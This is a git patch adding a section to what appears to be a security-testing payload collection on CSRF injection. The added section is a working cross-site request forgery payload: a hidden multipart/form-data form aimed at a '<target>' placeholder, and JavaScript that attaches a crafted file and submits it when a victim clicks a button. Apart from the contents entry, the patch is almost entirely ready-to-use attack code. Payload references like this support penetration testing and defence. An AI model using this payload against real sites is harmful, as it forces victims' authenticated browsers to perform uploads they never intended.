From b3e6220da660ace9ab677e1c984cf94287f7ef86 Mon Sep 17 00:00:00 2001
From: DoI <5291556+denandz@users.noreply.github.com>
Date: Wed, 17 Aug 2022 09:29:05 +1200
Subject: [PATCH] Add multipart/form-data CSRF technique

---
 CSRF Injection/README.md | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)

diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md
index 0ccd714..f6eb20b 100644
--- a/CSRF Injection/README.md	
+++ b/CSRF Injection/README.md	
@@ -11,6 +11,7 @@
     * [HTML GET - No User Interaction)](#html-get---no-user-interaction)
     * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
     * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
+    * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
     * [JSON GET - Simple Request](#json-get---simple-request)
     * [JSON POST - Simple Request](#json-post---simple-request)
     * [JSON POST - Complex Request](#json-post---complex-request)
@@ -67,6 +68,27 @@ When you are logged in to a certain site, you typically have a session. The iden
 </script>
 ```
 
+### HTML POST - multipart/form-data with file upload - Requiring User Interaction
+
+```html
+<script>
+function launch(){
+    const dT = new DataTransfer();
+    const file = new File( [ "CSRF-filecontent" ], "CSRF-filename" );
+    dT.items.add( file );
+    document.xss[0].files = dT.files;
+
+    document.xss.submit()
+}
+</script>
+
+<form style="display: none" name="xss" method="post" action="<target>" enctype="multipart/form-data">
+<input id="file" type="file" name="file"/>
+<input type="submit" name="" value="" size="0" />
+</form>
+<button value="button" onclick="launch()">Submit Request</button>
+```
+
 
 ### JSON GET - Simple Request